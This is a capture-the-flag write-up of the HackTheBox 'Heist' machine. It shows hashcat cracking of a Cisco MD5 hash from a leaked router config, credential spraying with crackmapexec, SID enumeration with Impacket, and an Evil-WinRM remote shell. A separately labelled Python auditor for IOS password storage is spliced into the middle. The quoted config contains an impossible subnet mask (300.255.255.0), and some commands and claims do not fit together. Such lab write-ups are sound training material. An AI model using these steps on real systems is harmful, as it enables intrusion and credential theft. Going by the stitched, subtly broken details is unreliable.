HTB Write-up | Heist
Retired machine can be found here.
After doing an initial scan with nmap, we find 3 exposed services:
- a web server on port 80 which seems to be a "Support Login Page";
- MSRPC on port 135;
- SMBv2 on port 445.
After trying and failing to access the SMB service with null credentials, I moved on to the web server.
smbclient -L heist.htb
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED
Wappalyzer gives us a nice overview of this server.
The initial page is the login page; however, clicking the "Login as guest" button redirects us to a much more interesting issues page.
On this page, there is what looks like a conversation between a user named Hazard and a member of the support team for a Cisco router.
Hazard was kind enough to provide us with a configuration file for their router, which is hosted at http://heist.htb/attachments/config.txt.
Unfortunately, we can't access other attachments which would have been interesting, so let's go through the config file.
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
This config file contains:
- 2 user passwords stored as Cisco Type 7 strings, a reversible obfuscation scheme (not real encryption) that can be decoded trivially;
- the enable secret, stored as a Type 5 (salted MD5) hash.
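As an added, defender-side example (this is not part of the original write-up, and it is not the machine's data), the Python script below audits an IOS config in this format for exactly the credential-storage weaknesses just listed: it classifies every "username" and "enable" entry by storage type (0 = cleartext, 7 = reversible obfuscation, 5 = MD5-crypt, 8/9 = PBKDF2/scrypt), checks that Type 7 and Type 5 strings have the expected shape, flags a missing or weak "security passwords min-length", and points out that "service password-encryption" only produces Type 7. The sample config and every hash-looking string in it are constructed placeholders, and the Finding class and audit_config function are names I chose for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample config in the IOS format quoted in the write-up.
# Every hash / obfuscated string here is a made-up placeholder of the right shape.
SAMPLE_CONFIG = """\
version 12.2
service password-encryption
hostname ios-1
security passwords min-length 12
enable secret 5 $1$abcd$abcdefghijklmnopqrstuv
username rout3r password 7 020A0B0C0D0E
username admin privilege 15 password 7 0501A
username backup password 0 Winter2019!
username ops secret 9 $9$placeholder$placeholderhash
line vty 0 4
 transport input ssh
"""


@dataclass
class Finding:
    severity: str  # CRITICAL, HIGH, MEDIUM or LOW
    line_no: int   # 0 means the finding applies to the whole config
    message: str


# IOS credential storage types: 0 = cleartext, 7 = reversible XOR obfuscation
# with a fixed, published key, 5 = MD5-crypt, 8 = PBKDF2-SHA256, 9 = scrypt.
_USER_RE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+(password|secret)\s+(?:(\d)\s+)?(\S+)$")
_ENABLE_RE = re.compile(r"^enable\s+(password|secret)\s+(?:(\d)\s+)?(\S+)$")
_MINLEN_RE = re.compile(r"^security\s+passwords\s+min-length\s+(\d+)$")
_TYPE7_RE = re.compile(r"^\d{2}(?:[0-9A-Fa-f]{2})+$")  # 2-digit seed, then hex byte pairs
_MD5CRYPT_RE = re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")


def _classify(subject, ptype, value, line_no):
    """Turn one credential line into a Finding (or None when the type is acceptable)."""
    ptype = ptype or "0"  # no type digit means IOS stored the value in cleartext
    if ptype == "0":
        return Finding("CRITICAL", line_no,
                       f"{subject}: cleartext credential (type 0); re-enter it as a type 9 secret")
    if ptype == "7":
        shape = "" if _TYPE7_RE.match(value) else " (malformed type 7 string)"
        return Finding("HIGH", line_no,
                       f"{subject}: type 7 is reversible obfuscation, not encryption{shape}; "
                       "re-enter it as a type 9 secret")
    if ptype == "5":
        shape = "" if _MD5CRYPT_RE.match(value) else " (malformed MD5-crypt string)"
        return Finding("MEDIUM", line_no,
                       f"{subject}: type 5 (MD5-crypt) is fast to attack offline{shape}; "
                       "migrate to type 8/9 (enable algorithm-type scrypt secret ...)")
    if ptype in ("8", "9"):
        return None  # PBKDF2-SHA256 / scrypt: acceptable
    return Finding("LOW", line_no, f"{subject}: unrecognised credential type {ptype}")


def audit_config(text):
    """Return the findings for an IOS running-config, sorted by line number."""
    findings = []
    min_length = None
    type7_seen = False
    pw_encryption_line = None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line == "service password-encryption":
            pw_encryption_line = line_no
            continue
        m = _MINLEN_RE.match(line)
        if m:
            min_length = int(m.group(1))
            continue
        m = _USER_RE.match(line)
        if m:
            user, _kw, ptype, value = m.groups()
            finding = _classify(f"username {user}", ptype, value, line_no)
        else:
            m = _ENABLE_RE.match(line)
            if not m:
                continue
            _kw, ptype, value = m.groups()
            finding = _classify("enable", ptype, value, line_no)
        if finding:
            findings.append(finding)
            type7_seen = type7_seen or ptype == "7"
    if pw_encryption_line and type7_seen:
        findings.append(Finding("LOW", pw_encryption_line,
                                "service password-encryption only applies type 7 obfuscation; "
                                "it does not protect credentials"))
    if min_length is None or min_length < 12:
        findings.append(Finding("LOW", 0,
                                "no 'security passwords min-length' of at least 12; "
                                "short passwords make offline guessing cheap"))
    return sorted(findings, key=lambda f: f.line_no)


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"[{f.severity}] line {f.line_no}: {f.message}")
```

Run it against a real running-config export to get a per-line list of credentials that need to be re-entered as Type 8/9 secrets; on the constructed sample it reports the two Type 7 users (one with a malformed string), the cleartext user, the MD5-crypt enable secret and the misleading password-encryption line, and it stays silent on the scrypt user.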
To "crack" the MD5 hash we use hashcat with the RockYou list, filtered down to words of 12 or more characters, since the "security passwords min-length 12" line in the config tells us that this router's passwords are at least 12 characters long.
$ hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou_12andabove.txt
where:
-a 0 = "straight" (wordlist) attack mode;
-m 500 = Cisco-IOS $1$ (MD5) hash type.
Now that we know the password of Hazard's router, we use crackmapexec to try to log in as Hazard on the machine:
$ crackmapexec heist.htb -u Hazard -p xxx
...
CME heist.htb:445 SUPPORTDESK [*] Windows 10.0 Build 17763 (name:SUPPORTDESK) (domain:SUPPORTDESK)
CME heist.htb:445 SUPPORTDESK [+] SUPPORTDESK\Hazard:xxx
So we now know that the machine runs Windows 10 (build 17763), that it is part of the SUPPORTDESK domain, and that the credentials we found are valid.
To enumerate the domain's users, we're going to use Impacket.
$ python impacket/build/scripts-2.7/lookupsid.py SUPPORTDESK/Hazard:xxx@heist.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
So, let's create a file with all the users we know about and a file with the 3 passwords we cracked and let's see what works:
$ crackmapexec heist.htb -d SUPPORTDESK -u users.txt -p passwords.txt
P.S. According to crackmapexec's manual, the -u option should accept a file as an argument, but this didn't work, so I had to test each user individually.
We find that one of the passwords is valid for Chase, so let's establish a remote session as that user with Evil-WinRM:
$ ruby evil-winrm/evil-winrm.rb -i heist.htb -u Chase -p 'xxx'
Evil-WinRM shell v1.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
And that's it!